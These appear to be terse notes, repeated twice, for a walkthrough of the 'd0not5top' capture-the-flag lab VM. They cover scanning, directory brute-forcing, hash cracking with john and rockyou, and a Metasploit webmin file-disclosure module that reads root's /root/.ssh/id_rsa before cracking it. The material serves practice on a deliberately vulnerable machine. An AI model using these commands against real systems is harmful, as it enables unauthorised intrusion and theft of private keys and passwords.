hack-d0not5top-vm-ctf-challenge
netdiscover
nmap -sV IP
visit the ip address
scan the webcontet using
dirb http://IP
check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1
Binary code to converted into Decimal
netcat very verbrose
nc -vv IP
www.asciitohex.com - hexadecimal
brain fuck encoding
splitbrain.org/services/ook
obfuscation/encoding
add the code.ctf to the /etc/hosts as
IP and filename.ctf
dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
cryptii.com/octal/text
interpret as octal convert to text
without the \
to access another terminal - use grep* and password the ctf name
exiftool - into an image and analyze the content.
john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
ssh username@IP
rbash shell
suedoh -l
surdoh /usr/bin/wmstrt
for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done
msf> use auxiliary/admin/webmin/file_disclosure
msf> auxiliary (file_disclosure) > set lhost 192.168.1.113
msf> auxiliary (file_disclosure) > set ssl true
msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa
msf> auxiliary (file_disclosure) > exploit
ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
nc -lp 1234 –vv
http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/
nmap -sV IP
visit the ip address
scan the webcontet using
dirb http://IP
check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1
Binary code to converted into Decimal
netcat very verbrose
nc -vv IP
www.asciitohex.com - hexadecimal
brain fuck encoding
splitbrain.org/services/ook
obfuscation/encoding
add the code.ctf to the /etc/hosts as
IP and filename.ctf
dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
cryptii.com/octal/text
interpret as octal convert to text
without the \
to access another terminal - use grep* and password the ctf name
exiftool - into an image and analyze the content.
john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
ssh username@IP
rbash shell
suedoh -l
surdoh /usr/bin/wmstrt
for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done
msf> use auxiliary/admin/webmin/file_disclosure
msf> auxiliary (file_disclosure) > set lhost 192.168.1.113
msf> auxiliary (file_disclosure) > set ssl true
msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa
msf> auxiliary (file_disclosure) > exploit
ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
nc -lp 1234 –vv
http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/